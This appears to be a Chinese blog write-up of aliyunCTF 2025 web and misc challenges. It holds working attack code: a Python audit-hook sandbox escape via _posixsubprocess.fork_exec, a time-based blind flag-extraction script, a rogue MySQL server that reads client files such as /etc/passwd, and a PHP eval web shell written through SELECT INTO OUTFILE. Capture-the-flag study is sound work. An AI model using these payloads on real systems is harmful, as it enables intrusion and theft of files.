aliyunCTF2025

燃尽了成绩也不咋地

友情提示:本文最后更新于 400 天前,文中的内容可能已有所发展或发生改变。

ezoj

import os
import subprocess
import uuid
import json
from flask import Flask, request, jsonify, send_file
from pathlib import Path

app = Flask(__name__)

SUBMISSIONS_PATH = Path("./submissions")
PROBLEMS_PATH = Path("./problems")

SUBMISSIONS_PATH.mkdir(parents=True, exist_ok=True)

CODE_TEMPLATE = """
import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event,args):
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError

sys.addaudithook(audit_checker)


"""


class OJTimeLimitExceed(Exception):
    pass


class OJRuntimeError(Exception):
    pass


@app.route("/")
def index():
    return send_file("static/index.html")


@app.route("/source")
def source():
    return send_file("server.py")


@app.route("/api/problems")
def list_problems():
    problems_dir = PROBLEMS_PATH
    problems = []
    for problem in problems_dir.iterdir():
        problem_config_file = problem / "problem.json"
        if not problem_config_file.exists():
            continue

        problem_config = json.load(problem_config_file.open("r"))
        problem = {
            "problem_id": problem.name,
            "name": problem_config["name"],
            "description": problem_config["description"],
        }
        problems.append(problem)

    problems = sorted(problems, key=lambda x: x["problem_id"])

    problems = {"problems": problems}
    return jsonify(problems), 200


@app.route("/api/submit", methods=["POST"])
def submit_code():
    try:
        data = request.get_json()
        code = data.get("code")
        problem_id = data.get("problem_id")

        if code is None or problem_id is None:
            return (
                jsonify({"status": "ER", "message": "Missing 'code' or 'problem_id'"}),
                400,
            )

        problem_id = str(int(problem_id))
        problem_dir = PROBLEMS_PATH / problem_id
        if not problem_dir.exists():
            return (
                jsonify(
                    {"status": "ER", "message": f"Problem ID {problem_id} not found!"}
                ),
                404,
            )

        code_filename = SUBMISSIONS_PATH / f"submission_{uuid.uuid4()}.py"
        with open(code_filename, "w") as code_file:
            code = CODE_TEMPLATE + code
            code_file.write(code)

        result = judge(code_filename, problem_dir)

        code_filename.unlink()

        return jsonify(result)

    except Exception as e:
        return jsonify({"status": "ER", "message": str(e)}), 500


def judge(code_filename, problem_dir):
    test_files = sorted(problem_dir.glob("*.input"))
    total_tests = len(test_files)
    passed_tests = 0

    try:
        for test_file in test_files:
            input_file = test_file
            expected_output_file = problem_dir / f"{test_file.stem}.output"

            if not expected_output_file.exists():
                continue

            case_passed = run_code(code_filename, input_file, expected_output_file)

            if case_passed:
                passed_tests += 1

        if passed_tests == total_tests:
            return {"status": "AC", "message": f"Accepted"}
        else:
            return {
                "status": "WA",
                "message": f"Wrang Answer: pass({passed_tests}/{total_tests})",
            }
    except OJRuntimeError as e:
        return {"status": "RE", "message": f"Runtime Error: ret={e.args[0]}"}
    except OJTimeLimitExceed:
        return {"status": "TLE", "message": "Time Limit Exceed"}


def run_code(code_filename, input_file, expected_output_file):
    with open(input_file, "r") as infile, open(
        expected_output_file, "r"
    ) as expected_output:
        expected_output_content = expected_output.read().strip()

        process = subprocess.Popen(
            ["python3", code_filename],
            stdin=infile,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )

        try:
            stdout, stderr = process.communicate(timeout=5)
        except subprocess.TimeoutExpired:
            process.kill()
            raise OJTimeLimitExceed

        if process.returncode != 0:
            raise OJRuntimeError(process.returncode)

        if stdout.strip() == expected_output_content:
            return True
        else:
            return False


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

是沙箱逃逸,绕过这个钩子函数

print(sum(map(int, input().split())))
#!/bin/bash

# 更新软件包列表
sudo apt update
sudo apt upgrade -y

# 安装必要的依赖
sudo apt install -y build-essential libssl-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libffi-dev python3-openssl git

# 下载 Python 3.12.9
cd /tmp
wget https://www.python.org/ftp/python/3.12.9/Python-3.12.9.tgz

# 解压缩下载的文件
tar -xvf Python-3.12.9.tgz
cd Python-3.12.9

# 配置、编译和安装
./configure --enable-optimizations
make -j $(nproc)
sudo make altinstall

# 确认安装成功
python3.12 --version

# 安装虚拟环境工具
sudo apt install -y python3.12-venv

# 创建一个新的虚拟环境
mkdir ~/myenvs
python3.12 -m venv ~/myenvs/py3.12.9

echo "Python 3.12.9 安装完成,虚拟环境已创建在 ~/myenvs/py3.12.9"
source ~/myenvs/py3.12.9/bin/activate
deactivate

绕过方法也是在网上查到的,知道这个函数可以不会触发钩子并且可以RCE 文章

1

print(sum(map(int, input().split())))
import os
import _posixsubprocess
_posixsubprocess.fork_exec([b"/bin/bash","-c","if [ $(head -n 1 /f* | cut -c 1) == 'a' ]; then sleep 5; fi;"], [b"/bin/bash"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)

然后写脚本,你们看我的字符表全是细节,前面几个字符都是我手动注入的,所以直接加

import requests
url="http://121.41.238.106:43953/api/submit"
target="aliyunctf{3"
char_set = "abcdef0123456789{}-ghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
for i in range(12,50):
    for j in char_set:
        payload=f"print(sum(map(int, input().split())))\nimport os\nimport _posixsubprocess\n_posixsubprocess.fork_exec([b\"/bin/bash\",\"-c\",\"if [ $(head -n 1 /f* | cut -c {i}) == '{j}' ]; then sleep 5; fi;\"], [b\"/bin/bash\"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)"
        burp0_json={"problem_id":"0","code": payload,}

        print(j)
        r=requests.post(url,json=burp0_json)
        if "Time Limit Exceed" in r.text:
            print(f"第{i}个字符是{j}")
            target+=j
            break
            print(target)
aliyunctf{3a1dd248-b636-41af-9b23-7540e7e63ebc}

看着简单吧,来的真不容易啊,呜呜呜

哈基游(remake)

<?php
$wrappers = stream_get_wrappers();
foreach ($wrappers as $wrapper) {
    if ($wrapper === 'file') {
        continue;
    }
    @stream_wrapper_unregister($wrapper);
}
?>

只保存了file文件流,也就是说只有file协议可以用了,

<?php
$func_template = 'function check($file_hash, %s) { if ($file_hash !== "5baf19ce6561538119dfe32d561d6ab8509703606f768fea72723a01ee4264b7") { echo "%s not cached"; } }';
$cached_key = isset($_GET['c']) ? $_GET['c'] : '$f_0';
if (!preg_match('/^[a-zA-Z0-9_\$]{1,5}$/', $cached_key)) {
        die('Invalid cached key');
}
$func = sprintf($func_template, $cached_key, $cached_key);
eval($func);
if (isset($_GET['h']) && isset($_GET['algo']) && isset($_GET['file'])) {
    $file_hash = hash_file($_GET['algo'], $_GET['file']);
    check($file_hash, $_GET['file']);
} else {
    phpinfo();
}
?>

会创建一个函数,然后利用函数来进行check,也就是说必须要hash相等才可以,单独把这个函数拿出来看看

<?php
function check($file_hash,%s){
    if ($file_hash !== "5baf19ce6561538119dfe32d561d6ab8509703606f768fea72723a01ee4264b7"){
        echo "%s not cached";
    }
}

其中这个%s的要求就是1-5位,自己去正则网站匹配一下就知道了,但是我感觉可以不设置的,重要的就是如何过hash然后进行文件读取,并且h这个参数是没有任何作用的,查看官方文档

1

发现支持很多算法,其中也有不安全的算法,比如说CRC,在给定足够多的不同CRC校验码的情况下,可以恢复出校验前的内容。我们可以通过把%s设置为int类型,然后再传入字符串进行报错得到部分信息

?c=int$c&algo=crc32&file=/flag&h=1
316abacb

?c=int$c&algo=crc32b&file=/flag&h=1
634894db

?c=int$c&algo=crc32c&file=/flag&h=1
9b821287

拿到三组数据,Dockerfile里面可以得到flag的字符数量

RUN echo "aliyunctf{`head /dev/urandom | tr -dc A-Za-z0-9 | head -c 15`}" > /flag

可以进行爆破,恢复flag

Rust Action(remake)

scp -r rust_action_3b2f22ed9cf639662353fdf583070c965fb09a29a1afd3e0095ddc08bd2cc7b7 root@156.238.233.93:/opt/docker

文件上传的地方没有检查出文件类型

pub async fn upload_job(mut multipart: Multipart) -> Result<String, AppError> {
    if !&CONFIG.workflow.jobs.enable {
        return Err(AppError(anyhow::anyhow!("Jobs module is disabled")));
    }

    let Some(field) = multipart.next_field().await? else {
        return Err(AppError(anyhow::anyhow!("No file uploaded")));
    };

    let id = Uuid::new_v4();
    let target_dir = std::path::Path::new(&CONFIG.workflow.jobs.dir).join(id.to_string());
    fs::create_dir_all(&target_dir).await?;

运行任务的地方直接进行了命令执行

pub async fn run_job(Path(id): Path<Uuid>) -> Result<String, AppError> {
    let job = DB.get_job(id).ok_or_else(|| anyhow::anyhow!("Job not found"))?;

    let output = Command::new(&job.command)
        .args(&job.args)
        .output()
        .await?;

下载文件的地方可以进行目录遍历

pub async fn download_artifact(Path(id): Path<Uuid>) -> Result<impl IntoResponse, AppError> {
    let artifact = DB.get_artifact(id).ok_or_else(|| anyhow::anyhow!("Artifact not found"))?;
    let file_path = std::path::Path::new(&CONFIG.artifacts.dir).join(&artifact.filename);

    let file = fs::read(file_path).await?;
    Ok((HeaderMap::new(), file))
}

但是经过尝试之后发现不出问题,查看WP,利用 Rust 的过程宏在编译期间执行代码,呆jio不,看官方WP吧,我也没看太懂这个题 RUST官方WP

mba

scp -r distrib root@156.238.233.93:/opt/docker

docker build -t mba .
docker run -it --name mba_container -p 9048:9048 mba

1

把代码甩给GPT,给了一个恒真式

def check_expression(t: z3.Tactic, e: MBAExpr) -> bool:
  expr = e.to_z3expr(64)
  s = t.solver()
  s.add(expr != expr)

  s.set('timeout', 30000)   # 30 seconds
  r = s.check()
  if r == z3.unknown:
    print("Solver timed out")
    exit(1)
  return r == z3.unsat

检查一个 MBAExpr 表达式是否始终等于自身。 但因为 expr != expr 永远是 False,所以 Z3 只会返回 unsat,这个函数永远返回 True,输入长度不能超过 200 字符。表达式的项数不能超过 15 项

nc 121.41.238.106 50423

(x^x)+(x^x)+(x^x)+(x^x)+(x^x)+(x^x)+(x^x)+(x^x)+(x^x)+(x^x)+(x^x)+(x^x)
It works
# 诶一个神奇的现象发生了,因为公式过于复杂导致他超时,那我直接加大,让他溢出,返回不了true
Please enter the expression: (x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)
Solver timed out
# 我想的是直接把项数也给加大,结果不然,他没超时了
root@dkhkv2c52uxRFLESq7AS:~# nc 121.41.238.106 50423
Please enter the expression: (x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)
It works!
^C
root@dkhkv2c52uxRFLESq7AS:~# nc 121.41.238.106 50423
Please enter the expression: (x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)
It works!
^C
root@dkhkv2c52uxRFLESq7AS:~# nc 121.41.238.106 50423
Please enter the expression: (x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)+(x^y)
Solver timed out

那么也就是说必须是十二项,而且还要加大系数

1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)+1000000000*(x^y)
Expression is too long

9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)+9999999*(x^y)
It works!

99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)+99999999*(x^y)
aliyunctf{0c83f9d9-a3a6-4664-a819-14d4376f2cbf}
a = "99999999*(x^y)+" * 13
if len(a) < 200:
    print(a)
x = 1
y = 1
if (x ^ y) == (x ^ y):
    print(1)

但是由于着急,我并没有给13改成12一样成功了,相当于是整型溢出的漏洞,也就是总数达到一个值就够了,不是说非要怎么这么样

打卡OK

扫出来可以用/index.php~来泄露源码,收集了

<?php
$servername = "localhost";
$username = "web";
$password = "web";
$dbname = "web";
$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}
session_start();
include './pass.php';
if(isset($_POST['username']) and isset($_POST['password'])){
    $username=addslashes($_POST['username']);
    $password=$_POST['password'];
    $code=$_POST['code'];
    $endpass=md5($code.$password).':'.$code;
    $sql = "select password from users where username='$username'";
    $result = $conn->query($sql);
    if ($result->num_rows > 0) {
        while($row = $result->fetch_assoc()) {
            if($endpass==$row['password']){
            $_SESSION['login'] = 1;
            $_SESSION['username'] = md5($username);
            echo "<script>alert(\"Welcome $username!\");window.location.href=\"./index.php\";</script>";
            }
        }
    } else {
        echo "<script>alert(\"错误\");</script>";
      die();
    }
    $conn->close();
    
}
?>

有这个函数addslashes不太可能注入了,然后看看看发现一点用没有,最后题目名字是个文件,这他妈也太抽象了吧/ok.php~,然后复现这个CVE,

create database adminer;
use adminer; 
create table test(text text(4096)); 
select * from test;
sudo cat /etc/mysql/debian.cnf

然后链接,发现不对啊,读不出来,一直报错并且我尝试了,脚本是对的

from socket import AF_INET, SOCK_STREAM, error
from asyncore import dispatcher, loop as _asyLoop
from asynchat import async_chat
from struct import Struct
from sys import version_info
from logging import getLogger, INFO, StreamHandler, Formatter

_rouge_mysql_sever_read_file_result = {

}
_rouge_mysql_server_read_file_end = False


def checkVersionPy3():
    return not version_info < (3, 0)


def rouge_mysql_sever_read_file(fileName, port, showInfo):
    if showInfo:
        log = getLogger(__name__)
        log.setLevel(INFO)
        tmp_format = StreamHandler()
        tmp_format.setFormatter(Formatter("%(asctime)s : %(levelname)s : %(message)s"))
        log.addHandler(
            tmp_format
        )

    def _infoShow(*args):
        if showInfo:
            log.info(*args)

    # ================================================
    # =======No need to change after this lines=======
    # ================================================

    __author__ = 'Gifts'
    __modify__ = 'Morouu'

    global _rouge_mysql_sever_read_file_result

    class _LastPacket(Exception):
        pass

    class _OutOfOrder(Exception):
        pass

    class _MysqlPacket(object):
        packet_header = Struct('<Hbb')
        packet_header_long = Struct('<Hbbb')

        def __init__(self, packet_type, payload):
            if isinstance(packet_type, _MysqlPacket):
                self.packet_num = packet_type.packet_num + 1
            else:
                self.packet_num = packet_type
            self.payload = payload

        def __str__(self):
            payload_len = len(self.payload)
            if payload_len < 65536:
                header = _MysqlPacket.packet_header.pack(payload_len, 0, self.packet_num)
            else:
                header = _MysqlPacket.packet_header.pack(payload_len & 0xFFFF, payload_len >> 16, 0, self.packet_num)

            result = "".join(
                (
                    header.decode("latin1") if checkVersionPy3() else header,
                    self.payload
                )
            )

            return result

        def __repr__(self):
            return repr(str(self))

        @staticmethod
        def parse(raw_data):
            packet_num = raw_data[0] if checkVersionPy3() else ord(raw_data[0])
            payload = raw_data[1:]

            return _MysqlPacket(packet_num, payload.decode("latin1") if checkVersionPy3() else payload)

    class _HttpRequestHandler(async_chat):

        def __init__(self, addr):
            async_chat.__init__(self, sock=addr[0])
            self.addr = addr[1]
            self.ibuffer = []
            self.set_terminator(3)
            self.stateList = [b"LEN", b"Auth", b"Data", b"MoreLength", b"File"] if checkVersionPy3() else ["LEN",
                                                                                                           "Auth",
                                                                                                           "Data",
                                                                                                           "MoreLength",
                                                                                                           "File"]
            self.state = self.stateList[0]
            self.sub_state = self.stateList[1]
            self.logined = False
            self.file = ""
            self.push(
                _MysqlPacket(
                    0,
                    "".join((
                        '\x0a',  # Protocol
                        '5.6.28-0ubuntu0.14.04.1' + '\0',
                        '\x2d\x00\x00\x00\x40\x3f\x59\x26\x4b\x2b\x34\x60\x00\xff\xf7\x08\x02\x00\x7f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x68\x69\x59\x5f\x52\x5f\x63\x55\x60\x64\x53\x52\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00',
                    )))
            )

            self.order = 1
            self.states = [b'LOGIN', b'CAPS', b'ANY'] if checkVersionPy3() else ['LOGIN', 'CAPS', 'ANY']

        def push(self, data):
            _infoShow('Pushed: %r', data)
            data = str(data)
            async_chat.push(self, data.encode("latin1") if checkVersionPy3() else data)

        def collect_incoming_data(self, data):
            _infoShow('Data recved: %r', data)
            self.ibuffer.append(data)

        def found_terminator(self):
            data = b"".join(self.ibuffer) if checkVersionPy3() else "".join(self.ibuffer)
            self.ibuffer = []

            if self.state == self.stateList[0]:  # LEN
                len_bytes = data[0] + 256 * data[1] + 65536 * data[2] + 1 if checkVersionPy3() else ord(
                    data[0]) + 256 * ord(data[1]) + 65536 * ord(data[2]) + 1
                if len_bytes < 65536:
                    self.set_terminator(len_bytes)
                    self.state = self.stateList[2]  # Data
                else:
                    self.state = self.stateList[3]  # MoreLength
            elif self.state == self.stateList[3]:  # MoreLength
                if (checkVersionPy3() and data[0] != b'\0') or data[0] != '\0':
                    self.push(None)
                    self.close_when_done()
                else:
                    self.state = self.stateList[2]  # Data
            elif self.state == self.stateList[2]:  # Data
                packet = _MysqlPacket.parse(data)
                try:
                    if self.order != packet.packet_num:
                        raise _OutOfOrder()
                    else:
                        # Fix ?
                        self.order = packet.packet_num + 2
                    if packet.packet_num == 0:
                        if packet.payload[0] == '\x03':
                            _infoShow('Query')

                            self.set_terminator(3)
                            self.state = self.stateList[0]  # LEN
                            self.sub_state = self.stateList[4]  # File
                            self.file = fileName.pop(0)

                            # end
                            if len(fileName) == 1:
                                global _rouge_mysql_server_read_file_end
                                _rouge_mysql_server_read_file_end = True

                            self.push(_MysqlPacket(
                                packet,
                                '\xFB{0}'.format(self.file)
                            ))
                        elif packet.payload[0] == '\x1b':
                            _infoShow('SelectDB')
                            self.push(_MysqlPacket(
                                packet,
                                '\xfe\x00\x00\x02\x00'
                            ))
                            raise _LastPacket()
                        elif packet.payload[0] in '\x02':
                            self.push(_MysqlPacket(
                                packet, '\0\0\0\x02\0\0\0'
                            ))
                            raise _LastPacket()
                        elif packet.payload == '\x00\x01':
                            self.push(None)
                            self.close_when_done()
                        else:
                            raise ValueError()
                    else:
                        if self.sub_state == self.stateList[4]:  # File
                            _infoShow('-- result')
                            # fileContent
                            _infoShow('Result: %r', data)
                            if len(data) == 1:
                                self.push(
                                    _MysqlPacket(packet, '\0\0\0\x02\0\0\0')
                                )
                                raise _LastPacket()
                            else:
                                self.set_terminator(3)
                                self.state = self.stateList[0]  # LEN
                                self.order = packet.packet_num + 1

                            global _rouge_mysql_sever_read_file_result
                            _rouge_mysql_sever_read_file_result.update(
                                {self.file: data.encode() if not checkVersionPy3() else data}
                            )

                            # test
                            # print(self.file + ":\n" + content.decode() if checkVersionPy3() else content)

                            self.close_when_done()

                        elif self.sub_state == self.stateList[1]:  # Auth
                            self.push(_MysqlPacket(
                                packet, '\0\0\0\x02\0\0\0'
                            ))
                            raise _LastPacket()
                        else:
                            _infoShow('-- else')
                            raise ValueError('Unknown packet')
                except _LastPacket:
                    _infoShow('Last packet')
                    self.state = self.stateList[0]  # LEN
                    self.sub_state = None
                    self.order = 0
                    self.set_terminator(3)
                except _OutOfOrder:
                    _infoShow('Out of order')
                    self.push(None)
                    self.close_when_done()
            else:
                _infoShow('Unknown state')
                self.push('None')
                self.close_when_done()

    class _MysqlListener(dispatcher):
        def __init__(self, sock=None):
            dispatcher.__init__(self, sock)

            if not sock:
                self.create_socket(AF_INET, SOCK_STREAM)
                self.set_reuse_addr()
                try:
                    self.bind(('', port))
                except error:
                    exit()

                self.listen(1)

        def handle_accept(self):
            pair = self.accept()

            if pair is not None:
                _infoShow('Conn from: %r', pair[1])
                _HttpRequestHandler(pair)

                if _rouge_mysql_server_read_file_end:
                    self.close()

    _MysqlListener()
    _asyLoop()
    return _rouge_mysql_sever_read_file_result


if __name__ == '__main__':

    for name, content in rouge_mysql_sever_read_file(fileName=["/etc/passwd", "/etc/hosts"], port=3307,showInfo=True).items():
        print(name + ":\n" + content.decode())

后面发现是弱密码localhost\root\root\Adminer

select "<?php @eval($_POST[1]);?>" into outfile '/var/www/html/1.php'

就在根目录,我一紧张没看到这个/Ali_t1hs_1sflag_2025

Licensed under CC BY-NC-SA 4.0